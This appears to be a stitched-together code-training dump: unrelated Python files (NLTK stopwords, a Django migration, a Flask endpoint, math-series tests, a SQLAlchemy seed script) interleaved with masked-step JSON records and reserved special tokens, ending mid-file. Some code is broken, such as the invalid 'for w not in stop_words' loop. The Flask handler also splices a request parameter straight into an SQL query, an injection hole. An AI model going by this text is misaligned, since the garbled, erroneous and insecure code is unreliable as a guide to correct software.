"step-1": "from nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\n\r\n#Print Stop words\r\nstop_words = set(stopwords.words(\"english\"))\r\nprint(stop_words)\r\n\r\nexample_text = \"This is general sentence to just clarify if stop words are working or not. I have some awesome projects coming up\"\r\n\r\nwords = word_tokenize(example_text)\r\n\r\nfiltered_sentence = []\r\nfor w in words:\r\n for w not in stop_words:\r\n filtered_sentence.append(w)\r\n\r\n#print filtered sentences\r\nprint(filtered_sentence)\r\n\r\n#print in a line\r\nfiltered_sentence1 = [w for w in words if not w in stop_words]\r\n\r\n#print filtered sentences\r\nprint(filtered_sentence1)\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import versatileimagefield.fields
class Migration(migrations.Migration):
dependencies = [
('venue', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Images',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('image', versatileimagefield.fields.VersatileImageField(upload_to=b'images', verbose_name=b'Image')),
('created_at', models.DateTimeField(help_text=b'Date when category created.', verbose_name=b'Created At', auto_now_add=True)),
('updated_at', models.DateTimeField(help_text=b'Date when category updated.', verbose_name=b'Updated At', auto_now=True)),
('category', models.ForeignKey(related_name='images', blank=True, to='venue.Category', null=True)),
],
),
]
|
normal
|
{
"blob_id": "09bf7460b2c928bf6e1346d9d1e2e1276540c080",
"index": 3099,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('venue', '0001_initial')]\n operations = [migrations.CreateModel(name='Images', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('image', versatileimagefield.fields.\n VersatileImageField(upload_to=b'images', verbose_name=b'Image')), (\n 'created_at', models.DateTimeField(help_text=\n b'Date when category created.', verbose_name=b'Created At',\n auto_now_add=True)), ('updated_at', models.DateTimeField(help_text=\n b'Date when category updated.', verbose_name=b'Updated At',\n auto_now=True)), ('category', models.ForeignKey(related_name=\n 'images', blank=True, to='venue.Category', null=True))])]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\nimport versatileimagefield.fields\n\n\nclass Migration(migrations.Migration):\n dependencies = [('venue', '0001_initial')]\n operations = [migrations.CreateModel(name='Images', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('image', versatileimagefield.fields.\n VersatileImageField(upload_to=b'images', verbose_name=b'Image')), (\n 'created_at', models.DateTimeField(help_text=\n b'Date when category created.', verbose_name=b'Created At',\n auto_now_add=True)), ('updated_at', models.DateTimeField(help_text=\n b'Date when category updated.', verbose_name=b'Updated At',\n auto_now=True)), ('category', models.ForeignKey(related_name=\n 'images', blank=True, to='venue.Category', null=True))])]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport versatileimagefield.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('venue', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Images',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('image', versatileimagefield.fields.VersatileImageField(upload_to=b'images', verbose_name=b'Image')),\n ('created_at', models.DateTimeField(help_text=b'Date when category created.', verbose_name=b'Created At', auto_now_add=True)),\n ('updated_at', models.DateTimeField(help_text=b'Date when category updated.', verbose_name=b'Updated At', auto_now=True)),\n ('category', models.ForeignKey(related_name='images', blank=True, to='venue.Category', null=True)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(10):
count = 0
for j in range(len(num)):
if i == int(num[j]):
count += 1
else:
continue
print(count)
<|reserved_special_token_1|>
A = int(input())
B = int(input())
C = int(input())
number = A * B * C
num = str(number)
for i in range(10):
count = 0
for j in range(len(num)):
if i == int(num[j]):
count += 1
else:
continue
print(count)
<|reserved_special_token_1|>
A = int(input())
B = int(input())
C = int(input())
number = A * B * C
num = str(number)
for i in range(10): # 9를 입력해서 첨에 틀림 !
count = 0
for j in range(len(num)):
if i == int(num[j]):
count += 1
else:
continue
print(count)
|
flexible
|
{
"blob_id": "b43ea8c32207bf43abc3b9b490688fde0706d876",
"index": 4633,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n",
"step-3": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n",
"step-4": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10): # 9를 입력해서 첨에 틀림 !\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n ",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
__author__ = 'jz'
from flask.ext import restful
from flask.ext.restful import reqparse
from scs_app.db_connect import *
parser = reqparse.RequestParser()
parser.add_argument('count', type=str)
class MulActionResource(restful.Resource):
def __init__(self):
self.db = get_connection()
def post(self, type):
args = parser.parse_args()
count = args.get('count')
sids = []
if type == 'extract':
# todo multi extract
pass
elif type == 'location':
articles = self.db.query(
"select article.sid,title,content from article left join site on article.site_sid=site.sid"
" where lang='cn' and location_sid IS NULL LIMIT 0," + count)
locations = self.db.query('select sid,name,data from location where name!=%s', (u'其它',))
other_sid = self.db.get('select sid from location where name=%s', (u'其它',))['sid']
for article in articles:
sids.append(article['sid'])
content = article['title'] + article['content']
lc = False
for location in locations:
sid = location['sid']
words = [location['name']]
if location['data']:
words += location['data'].split('|')
for word in words:
if word in content:
lc = True
self.db.update('update article set location_sid=%s where sid=%s', (sid, article['sid']))
break
if lc:
break
if not lc:
self.db.update('update article set location_sid=%s where sid=%s', (other_sid, article['sid']))
return {
'count': count,
'sids': sids
}
else:
return 'no such command', 404
|
normal
|
{
"blob_id": "44476a32b8ab68820d73955321e57b7d1b608beb",
"index": 6823,
"step-1": "<mask token>\n\n\nclass MulActionResource(restful.Resource):\n\n def __init__(self):\n self.db = get_connection()\n\n def post(self, type):\n args = parser.parse_args()\n count = args.get('count')\n sids = []\n if type == 'extract':\n pass\n elif type == 'location':\n articles = self.db.query(\n \"select article.sid,title,content from article left join site on article.site_sid=site.sid where lang='cn' and location_sid IS NULL LIMIT 0,\"\n + count)\n locations = self.db.query(\n 'select sid,name,data from location where name!=%s', (u'其它',))\n other_sid = self.db.get('select sid from location where name=%s',\n (u'其它',))['sid']\n for article in articles:\n sids.append(article['sid'])\n content = article['title'] + article['content']\n lc = False\n for location in locations:\n sid = location['sid']\n words = [location['name']]\n if location['data']:\n words += location['data'].split('|')\n for word in words:\n if word in content:\n lc = True\n self.db.update(\n 'update article set location_sid=%s where sid=%s'\n , (sid, article['sid']))\n break\n if lc:\n break\n if not lc:\n self.db.update(\n 'update article set location_sid=%s where sid=%s',\n (other_sid, article['sid']))\n return {'count': count, 'sids': sids}\n else:\n return 'no such command', 404\n",
"step-2": "<mask token>\nparser.add_argument('count', type=str)\n\n\nclass MulActionResource(restful.Resource):\n\n def __init__(self):\n self.db = get_connection()\n\n def post(self, type):\n args = parser.parse_args()\n count = args.get('count')\n sids = []\n if type == 'extract':\n pass\n elif type == 'location':\n articles = self.db.query(\n \"select article.sid,title,content from article left join site on article.site_sid=site.sid where lang='cn' and location_sid IS NULL LIMIT 0,\"\n + count)\n locations = self.db.query(\n 'select sid,name,data from location where name!=%s', (u'其它',))\n other_sid = self.db.get('select sid from location where name=%s',\n (u'其它',))['sid']\n for article in articles:\n sids.append(article['sid'])\n content = article['title'] + article['content']\n lc = False\n for location in locations:\n sid = location['sid']\n words = [location['name']]\n if location['data']:\n words += location['data'].split('|')\n for word in words:\n if word in content:\n lc = True\n self.db.update(\n 'update article set location_sid=%s where sid=%s'\n , (sid, article['sid']))\n break\n if lc:\n break\n if not lc:\n self.db.update(\n 'update article set location_sid=%s where sid=%s',\n (other_sid, article['sid']))\n return {'count': count, 'sids': sids}\n else:\n return 'no such command', 404\n",
"step-3": "__author__ = 'jz'\n<mask token>\nparser = reqparse.RequestParser()\nparser.add_argument('count', type=str)\n\n\nclass MulActionResource(restful.Resource):\n\n def __init__(self):\n self.db = get_connection()\n\n def post(self, type):\n args = parser.parse_args()\n count = args.get('count')\n sids = []\n if type == 'extract':\n pass\n elif type == 'location':\n articles = self.db.query(\n \"select article.sid,title,content from article left join site on article.site_sid=site.sid where lang='cn' and location_sid IS NULL LIMIT 0,\"\n + count)\n locations = self.db.query(\n 'select sid,name,data from location where name!=%s', (u'其它',))\n other_sid = self.db.get('select sid from location where name=%s',\n (u'其它',))['sid']\n for article in articles:\n sids.append(article['sid'])\n content = article['title'] + article['content']\n lc = False\n for location in locations:\n sid = location['sid']\n words = [location['name']]\n if location['data']:\n words += location['data'].split('|')\n for word in words:\n if word in content:\n lc = True\n self.db.update(\n 'update article set location_sid=%s where sid=%s'\n , (sid, article['sid']))\n break\n if lc:\n break\n if not lc:\n self.db.update(\n 'update article set location_sid=%s where sid=%s',\n (other_sid, article['sid']))\n return {'count': count, 'sids': sids}\n else:\n return 'no such command', 404\n",
"step-4": "__author__ = 'jz'\nfrom flask.ext import restful\nfrom flask.ext.restful import reqparse\nfrom scs_app.db_connect import *\nparser = reqparse.RequestParser()\nparser.add_argument('count', type=str)\n\n\nclass MulActionResource(restful.Resource):\n\n def __init__(self):\n self.db = get_connection()\n\n def post(self, type):\n args = parser.parse_args()\n count = args.get('count')\n sids = []\n if type == 'extract':\n pass\n elif type == 'location':\n articles = self.db.query(\n \"select article.sid,title,content from article left join site on article.site_sid=site.sid where lang='cn' and location_sid IS NULL LIMIT 0,\"\n + count)\n locations = self.db.query(\n 'select sid,name,data from location where name!=%s', (u'其它',))\n other_sid = self.db.get('select sid from location where name=%s',\n (u'其它',))['sid']\n for article in articles:\n sids.append(article['sid'])\n content = article['title'] + article['content']\n lc = False\n for location in locations:\n sid = location['sid']\n words = [location['name']]\n if location['data']:\n words += location['data'].split('|')\n for word in words:\n if word in content:\n lc = True\n self.db.update(\n 'update article set location_sid=%s where sid=%s'\n , (sid, article['sid']))\n break\n if lc:\n break\n if not lc:\n self.db.update(\n 'update article set location_sid=%s where sid=%s',\n (other_sid, article['sid']))\n return {'count': count, 'sids': sids}\n else:\n return 'no such command', 404\n",
"step-5": "# -*- coding: utf-8 -*-\r\n__author__ = 'jz'\r\n\r\nfrom flask.ext import restful\r\nfrom flask.ext.restful import reqparse\r\n\r\nfrom scs_app.db_connect import *\r\n\r\nparser = reqparse.RequestParser()\r\nparser.add_argument('count', type=str)\r\n\r\n\r\nclass MulActionResource(restful.Resource):\r\n def __init__(self):\r\n self.db = get_connection()\r\n\r\n def post(self, type):\r\n args = parser.parse_args()\r\n count = args.get('count')\r\n sids = []\r\n if type == 'extract':\r\n # todo multi extract\r\n pass\r\n elif type == 'location':\r\n articles = self.db.query(\r\n \"select article.sid,title,content from article left join site on article.site_sid=site.sid\"\r\n \" where lang='cn' and location_sid IS NULL LIMIT 0,\" + count)\r\n locations = self.db.query('select sid,name,data from location where name!=%s', (u'其它',))\r\n other_sid = self.db.get('select sid from location where name=%s', (u'其它',))['sid']\r\n for article in articles:\r\n sids.append(article['sid'])\r\n content = article['title'] + article['content']\r\n lc = False\r\n for location in locations:\r\n sid = location['sid']\r\n words = [location['name']]\r\n if location['data']:\r\n words += location['data'].split('|')\r\n for word in words:\r\n if word in content:\r\n lc = True\r\n self.db.update('update article set location_sid=%s where sid=%s', (sid, article['sid']))\r\n break\r\n if lc:\r\n break\r\n if not lc:\r\n self.db.update('update article set location_sid=%s where sid=%s', (other_sid, article['sid']))\r\n return {\r\n 'count': count,\r\n 'sids': sids\r\n }\r\n else:\r\n return 'no such command', 404",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import math_series.series as func
""" Testing for fibonacci function """
def test_fibonacci_zero():
actual = func.fibonacci(0)
expected = 0
assert actual == expected
def test_fibonacci_one():
actual = func.fibonacci(1)
expected = 1
assert actual == expected
def test_fibonacci_negative():
actual = func.fibonacci(-5)
expected = "Negative values are not allowable"
assert actual == expected
def test_fibonacci_else():
actual = func.fibonacci(6)
expected = 8
assert actual == expected
""" Testing for lucas function """
def test_lucas_zero():
actual = func.lucas(0)
expected = 2
assert actual == expected
def test_lucas_one():
actual = func.lucas(1)
expected = 1
assert actual == expected
def test_lucas_negative():
actual = func.lucas(-5)
expected = "Negative values are not allowable"
assert actual == expected
def test_lucas_else():
actual = func.lucas(6)
expected = 18
assert actual == expected
""" Testing for non_fibonacci_lucas function """
def test_non_fibonacci_lucas_zero():
actual = func.non_fibonacci_lucas(0,2,4)
expected = 2
assert actual == expected
def test_non_fibonacci_lucas_one():
actual = func.non_fibonacci_lucas(1,2,4)
expected = 4
assert actual == expected
def test_non_fibonacci_lucas_negative():
actual = func.non_fibonacci_lucas(-5,2,4)
expected = "Negative values are not allowable"
assert actual == expected
def test_non_fibonacci_lucas_else():
actual = func.non_fibonacci_lucas(3,2,4)
expected = 10
assert actual == expected
|
normal
|
{
"blob_id": "49722f640eec02029865fd702e13e485eda6391b",
"index": 8126,
"step-1": "<mask token>\n\n\ndef test_fibonacci_zero():\n actual = func.fibonacci(0)\n expected = 0\n assert actual == expected\n\n\ndef test_fibonacci_one():\n actual = func.fibonacci(1)\n expected = 1\n assert actual == expected\n\n\ndef test_fibonacci_negative():\n actual = func.fibonacci(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_lucas_negative():\n actual = func.lucas(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_non_fibonacci_lucas_zero():\n actual = func.non_fibonacci_lucas(0, 2, 4)\n expected = 2\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_one():\n actual = func.non_fibonacci_lucas(1, 2, 4)\n expected = 4\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_negative():\n actual = func.non_fibonacci_lucas(-5, 2, 4)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_else():\n actual = func.non_fibonacci_lucas(3, 2, 4)\n expected = 10\n assert actual == expected\n",
"step-2": "<mask token>\n\n\ndef test_fibonacci_zero():\n actual = func.fibonacci(0)\n expected = 0\n assert actual == expected\n\n\ndef test_fibonacci_one():\n actual = func.fibonacci(1)\n expected = 1\n assert actual == expected\n\n\ndef test_fibonacci_negative():\n actual = func.fibonacci(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_lucas_zero():\n actual = func.lucas(0)\n expected = 2\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_lucas_negative():\n actual = func.lucas(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_non_fibonacci_lucas_zero():\n actual = func.non_fibonacci_lucas(0, 2, 4)\n expected = 2\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_one():\n actual = func.non_fibonacci_lucas(1, 2, 4)\n expected = 4\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_negative():\n actual = func.non_fibonacci_lucas(-5, 2, 4)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_else():\n actual = func.non_fibonacci_lucas(3, 2, 4)\n expected = 10\n assert actual == expected\n",
"step-3": "<mask token>\n\n\ndef test_fibonacci_zero():\n actual = func.fibonacci(0)\n expected = 0\n assert actual == expected\n\n\ndef test_fibonacci_one():\n actual = func.fibonacci(1)\n expected = 1\n assert actual == expected\n\n\ndef test_fibonacci_negative():\n actual = func.fibonacci(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_fibonacci_else():\n actual = func.fibonacci(6)\n expected = 8\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_lucas_zero():\n actual = func.lucas(0)\n expected = 2\n assert actual == expected\n\n\ndef test_lucas_one():\n actual = func.lucas(1)\n expected = 1\n assert actual == expected\n\n\ndef test_lucas_negative():\n actual = func.lucas(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_non_fibonacci_lucas_zero():\n actual = func.non_fibonacci_lucas(0, 2, 4)\n expected = 2\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_one():\n actual = func.non_fibonacci_lucas(1, 2, 4)\n expected = 4\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_negative():\n actual = func.non_fibonacci_lucas(-5, 2, 4)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_else():\n actual = func.non_fibonacci_lucas(3, 2, 4)\n expected = 10\n assert actual == expected\n",
"step-4": "import math_series.series as func\n<mask token>\n\n\ndef test_fibonacci_zero():\n actual = func.fibonacci(0)\n expected = 0\n assert actual == expected\n\n\ndef test_fibonacci_one():\n actual = func.fibonacci(1)\n expected = 1\n assert actual == expected\n\n\ndef test_fibonacci_negative():\n actual = func.fibonacci(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_fibonacci_else():\n actual = func.fibonacci(6)\n expected = 8\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_lucas_zero():\n actual = func.lucas(0)\n expected = 2\n assert actual == expected\n\n\ndef test_lucas_one():\n actual = func.lucas(1)\n expected = 1\n assert actual == expected\n\n\ndef test_lucas_negative():\n actual = func.lucas(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_lucas_else():\n actual = func.lucas(6)\n expected = 18\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_non_fibonacci_lucas_zero():\n actual = func.non_fibonacci_lucas(0, 2, 4)\n expected = 2\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_one():\n actual = func.non_fibonacci_lucas(1, 2, 4)\n expected = 4\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_negative():\n actual = func.non_fibonacci_lucas(-5, 2, 4)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_else():\n actual = func.non_fibonacci_lucas(3, 2, 4)\n expected = 10\n assert actual == expected\n",
"step-5": "import math_series.series as func\n\n\"\"\" Testing for fibonacci function \"\"\"\ndef test_fibonacci_zero():\n actual = func.fibonacci(0)\n expected = 0\n assert actual == expected\n\ndef test_fibonacci_one():\n actual = func.fibonacci(1)\n expected = 1\n assert actual == expected\n\n\ndef test_fibonacci_negative():\n actual = func.fibonacci(-5)\n expected = \"Negative values are not allowable\"\n assert actual == expected\n\n\ndef test_fibonacci_else():\n actual = func.fibonacci(6)\n expected = 8\n assert actual == expected\n\n\"\"\" Testing for lucas function \"\"\"\n\ndef test_lucas_zero():\n actual = func.lucas(0)\n expected = 2\n assert actual == expected\n\n\ndef test_lucas_one():\n actual = func.lucas(1)\n expected = 1\n assert actual == expected\n\n\n\ndef test_lucas_negative():\n actual = func.lucas(-5)\n expected = \"Negative values are not allowable\"\n assert actual == expected\n\n\ndef test_lucas_else():\n actual = func.lucas(6)\n expected = 18\n assert actual == expected\n\n\n\"\"\" Testing for non_fibonacci_lucas function \"\"\"\n\n\ndef test_non_fibonacci_lucas_zero():\n actual = func.non_fibonacci_lucas(0,2,4)\n expected = 2\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_one():\n actual = func.non_fibonacci_lucas(1,2,4)\n expected = 4\n assert actual == expected\n\n\n\ndef test_non_fibonacci_lucas_negative():\n actual = func.non_fibonacci_lucas(-5,2,4)\n expected = \"Negative values are not allowable\"\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_else():\n actual = func.non_fibonacci_lucas(3,2,4)\n expected = 10\n assert actual == expected",
"step-ids": [
8,
9,
11,
13,
14
]
}
|
[
8,
9,
11,
13,
14
] |
import time
if __name__ == '__main__':
for i in range(10):
print('here %s' % i)
time.sleep(1)
print('TEST SUCEEDED')
|
normal
|
{
"blob_id": "a159f9f9cc06bb9d22f84781fb2fc664ea204b64",
"index": 6856,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n for i in range(10):\n print('here %s' % i)\n time.sleep(1)\n print('TEST SUCEEDED')\n",
"step-3": "import time\nif __name__ == '__main__':\n for i in range(10):\n print('here %s' % i)\n time.sleep(1)\n print('TEST SUCEEDED')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
session.add(user_1)
session.commit()
<|reserved_special_token_0|>
session.add(country_1)
session.commit()
<|reserved_special_token_0|>
session.add(country_2)
session.commit()
<|reserved_special_token_0|>
session.add(country_3)
session.commit()
<|reserved_special_token_0|>
session.add(country_4)
session.commit()
<|reserved_special_token_0|>
session.add(country_5)
session.commit()
<|reserved_special_token_0|>
session.add(country_6)
session.commit()
<|reserved_special_token_0|>
session.add(country_7)
session.commit()
<|reserved_special_token_0|>
session.add(country_8)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
print('added countries and Tourist Places added')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
engine = create_engine('sqlite:///country_catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
user_1 = Users(name='admin', email='admin@admin.com')
session.add(user_1)
session.commit()
country_1 = Country(user_id=1, name='India')
session.add(country_1)
session.commit()
country_2 = Country(user_id=1, name='Australia')
session.add(country_2)
session.commit()
country_3 = Country(user_id=1, name='England')
session.add(country_3)
session.commit()
country_4 = Country(user_id=1, name='Paris')
session.add(country_4)
session.commit()
country_5 = Country(user_id=1, name='USA')
session.add(country_5)
session.commit()
country_6 = Country(user_id=1, name='Mexico')
session.add(country_6)
session.commit()
country_7 = Country(user_id=1, name='Srilanka')
session.add(country_7)
session.commit()
country_8 = Country(user_id=1, name='Maldives')
session.add(country_8)
session.commit()
places = TouristPlaces(user_id=1, name='Taj Mahal', description=
'Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal It is bultby using white marbel'
, country=country_1)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Red Fort', description=
'Red fort is the histroric fort in the city of Delhi,India.It is the main residence of the emperors of mughal Dynasty.'
, country=country_1)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Canberra', description=
'It is the home for National GAllery of Australiaand a wide varierty of cultural and historic sites'
, country=country_2)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Perth', description=
'The west side ofAustralia is home to the city of PerthIt is bordered by Indian Ocean'
, country=country_2)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Tower Of London', description=
'It is one of the world Heritage siteOther highlights are Crown Jewels Exhibition'
, country=country_3)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='British Museum', description=
'It contains the collection of worlds finest antiquitesThe famous artifacts are Eglin marbles'
, country=country_3)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Eiffel Tower', description=
'The Eiffel-tower is wrought iron latticeIt is named after the Engineer Gustav Eiffel'
, country=country_4)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='places of Versallies', description=
'The Palce of Versallies is the Principle Royalresidence.', country=
country_4)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Grand Canyon Village', description=
'Grand Canyon is located in south Rim of Grand CanyonIt is focussed on accomadating tourists visiting Grand Canyon'
, country=country_5)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Statue if Liberty', description=
'Statue of Liberty is Colossal neo-classical sculptureIn New-york Hourbor Newyork'
, country=country_5)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Mexico City', description=
'Mexico city is densely populated and high altitude capital Of MexicoIt is the home for zoo,Muesuem of modern Art.'
, country=country_6)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Tulum', description=
'Tulum is a town in the Carribean coatline of MexicoIt is well-known for beaches and ruins of Ancient Mayan port city'
, country=country_6)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Colombo', description=
'It is the Capital city of SrilankaIt sheritage is reflected in its Architecture'
, country=country_7)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Kandy', description=
'Kandy is the largest city of central Sri Lanka.It is surrounded by mountains which is home to tea Plantations.'
, country=country_7)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Male', description=
'It is among the tooped tourist Attractions of MaldivesIt has considerably moderate tempaerature through out the year'
, country=country_8)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Sun Island', description=
'It is adorned with some sparkling beachesbeuatigul flowers and lavish greenary that pulls a great number of tourists'
, country=country_8)
session.add(places)
session.commit()
print('added countries and Tourist Places added')
<|reserved_special_token_1|>
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Country, TouristPlaces, Users

# Bind the ORM models to the catalog database and open a session.
engine = create_engine('sqlite:///country_catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()

# Seed the single admin user that owns every catalog entry below.
user_1 = Users(name='admin', email='admin@admin.com')
session.add(user_1)
session.commit()

# Seed the eight countries.  A data-driven loop replaces the original
# copy-pasted add/commit blocks while keeping the same insertion order,
# so the auto-generated primary keys are unchanged.
_country_names = ['India', 'Australia', 'England', 'Paris', 'USA',
                  'Mexico', 'Srilanka', 'Maldives']
_countries = []
for _cname in _country_names:
    _country = Country(user_id=1, name=_cname)
    session.add(_country)
    session.commit()
    _countries.append(_country)

# Keep the original module-level names alive for any code that uses them.
(country_1, country_2, country_3, country_4,
 country_5, country_6, country_7, country_8) = _countries

# (name, description, country) rows for the tourist attractions; the
# description text is preserved byte-for-byte from the original seed data.
_attraction_rows = [
    ('Taj Mahal',
     'Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal It is bultby using white marbel',
     country_1),
    ('Red Fort',
     'Red fort is the histroric fort in the city of Delhi,India.It is the main residence of the emperors of mughal Dynasty.',
     country_1),
    ('Canberra',
     'It is the home for National GAllery of Australiaand a wide varierty of cultural and historic sites',
     country_2),
    ('Perth',
     'The west side ofAustralia is home to the city of PerthIt is bordered by Indian Ocean',
     country_2),
    ('Tower Of London',
     'It is one of the world Heritage siteOther highlights are Crown Jewels Exhibition',
     country_3),
    ('British Museum',
     'It contains the collection of worlds finest antiquitesThe famous artifacts are Eglin marbles',
     country_3),
    ('Eiffel Tower',
     'The Eiffel-tower is wrought iron latticeIt is named after the Engineer Gustav Eiffel',
     country_4),
    ('places of Versallies',
     'The Palce of Versallies is the Principle Royalresidence.',
     country_4),
    ('Grand Canyon Village',
     'Grand Canyon is located in south Rim of Grand CanyonIt is focussed on accomadating tourists visiting Grand Canyon',
     country_5),
    ('Statue if Liberty',
     'Statue of Liberty is Colossal neo-classical sculptureIn New-york Hourbor Newyork',
     country_5),
    ('Mexico City',
     'Mexico city is densely populated and high altitude capital Of MexicoIt is the home for zoo,Muesuem of modern Art.',
     country_6),
    ('Tulum',
     'Tulum is a town in the Carribean coatline of MexicoIt is well-known for beaches and ruins of Ancient Mayan port city',
     country_6),
    ('Colombo',
     'It is the Capital city of SrilankaIt sheritage is reflected in its Architecture',
     country_7),
    ('Kandy',
     'Kandy is the largest city of central Sri Lanka.It is surrounded by mountains which is home to tea Plantations.',
     country_7),
    ('Male',
     'It is among the tooped tourist Attractions of MaldivesIt has considerably moderate tempaerature through out the year',
     country_8),
    ('Sun Island',
     'It is adorned with some sparkling beachesbeuatigul flowers and lavish greenary that pulls a great number of tourists',
     country_8),
]
# One commit per row, mirroring the original script's transaction pattern.
for _pname, _description, _country in _attraction_rows:
    places = TouristPlaces(user_id=1, name=_pname, description=_description,
                           country=_country)
    session.add(places)
    session.commit()

print('added countries and Tourist Places added')
<|reserved_special_token_1|>
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Country, TouristPlaces, Users

# Create database and create a shortcut for easier database updates.
engine = create_engine('sqlite:///country_catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()


def _insert(obj):
    """Persist *obj* in its own commit (mirrors the original per-row
    add/commit pattern) and return it."""
    session.add(obj)
    session.commit()
    return obj


